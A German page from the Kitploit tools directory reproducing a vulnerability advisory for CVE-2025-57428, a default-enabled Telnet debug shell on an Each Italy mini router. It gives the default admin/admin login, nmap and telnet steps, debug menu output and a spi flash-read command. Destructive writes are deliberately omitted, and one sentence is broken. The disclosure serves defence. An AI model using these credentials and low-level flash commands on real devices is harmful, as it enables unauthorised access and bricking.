Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-57428 — CVE-2025-57428 | Kitploit
Tools/GitHubGitHub/5ulfur/cve-2025-57428
Embedded-System-SicherheitIoT-SicherheitSchwachstellenanalyseExploitationPenetrationstestsHardware-Sicherheit
GitHub5ulfur/cve-2025-57428

CVE-2025-57428

CVE-2025-57428

Repository anzeigen
1vor 6 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

⚠️ Dieses Repository wird nur als Referenz für CVE-2025-57428 gepflegt.

Für andere Sicherheitshinweise und Updates siehe: security-advisories.

CVE-2025-57428 - Telnet-Debug-Schnittstelle standardmäßig aktiviert ermöglicht Low-Level-Flash/Register-Zugriff

Betroffenes Produkt

  • Hersteller/Marke: Each Italy
  • Gerät: Wireless Mini Router WIRELESS-N 300M
  • Firmware: v28K.MiniRouter.20190211

Zusammenfassung

Dieses Gerät stellt eine Telnet-Debug-Schnittstelle (standardmäßig auf Port 23 aktiviert) bereit und akzeptiert Admin-Anmeldedaten (`admin`/`admin` standardmäßig). Nach der Authentifizierung bietet die Shell direkten Zugriff auf Low-Level-Befehle (insbesondere `spi` und `reg`), was zu willkürlicher Firmware-Beschädigung, Geräteausfall (Bricking) und Verlust von Funktionalität oder Sicherheitskonfiguration führen kann.


Nachweis (Proof of Concept)

Hinweis: Ich lasse absichtlich Befehle aus, die destruktive Schreibvorgänge durchführen. Der folgende PoC bestätigt die Existenz und Zugänglichkeit der Schnittstelle, ohne einen fertigen nutzbaren Exploit bereitzustellen.

  1. Scannen Sie das Gerät im LAN:

    root@kitploit:~
    nmap -p 23 <device-ip>
    

    Ergebnis: Port 23 (telnet) zeigt open.

  2. Verbinden Sie sich per Telnet und authentifizieren Sie sich (Standard-Anmeldedaten):

    root@kitploit:~
    telnet <device-ip>
    # Login as: admin
    # Password: admin
    

    Nach dem Login wird ein Debug-Prompt CMD> angezeigt.

  3. Verfügbare Befehle auflisten:

    root@kitploit:~
    CMD>help
    

    Die Hilfeausgabe zeigt die folgenden Menüs:

    root@kitploit:~
    cfg         net         os
    

    Wechseln Sie in das Menü os:

    root@kitploit:~
    CMD>os
    

    Listen Sie erneut die verfügbaren Befehle auf:

    root@kitploit:~
    OS>help
    

    Dieses Mal zeigt die Hilfeausgabe die folgenden Befehle:

    root@kitploit:~
    thread      mem         spi         reg         cpuload     cpubusy     event
    

    Die Verwendung von zeigt .

Beobachtungen:

  • Das Ändern des Admin-Passworts über die Weboberfläche ändert auch die Telnet-Anmeldedaten, was auf gemeinsame Anmeldedaten hinweist.
  • Telnet bleibt nach der Ersteinrichtung standardmäßig aktiviert.

Kommunikation mit dem Hersteller

Versuche, einen Sicherheitskontakt oder Supportkanal des ursprünglichen Herstellers zu finden, waren erfolglos. Das Produkt scheint ein umbenanntes Gerät unbekannter Herkunft zu sein.

Haftungsausschluss

Diese Informationen werden nur zu Bildungs- und Verteidigungszwecken bereitgestellt. Der Autor übernimmt keine Verantwortung für einen Missbrauch dieser Informationen.

Tool herunterladen
spi
spi <rd/wr/er> <addr> [len]
  • Flash-Speicher auslesen:

    root@kitploit:~
    OS>spi rd 0x000fd0f0 16
    

    Dies gibt einen Hex-Dump des Flash-Bereichs zurück:

    root@kitploit:~
    4f30650a 938f56fa 1b663a19 e316d824
    

    Dies bestätigt, dass der Befehl funktioniert und die Shell Low-Level-Zugriff hat. Der Schreibbefehl (spi wr) und der Löschbefehl (spi er) sowie die reg-Befehle sind ebenfalls ausführbar.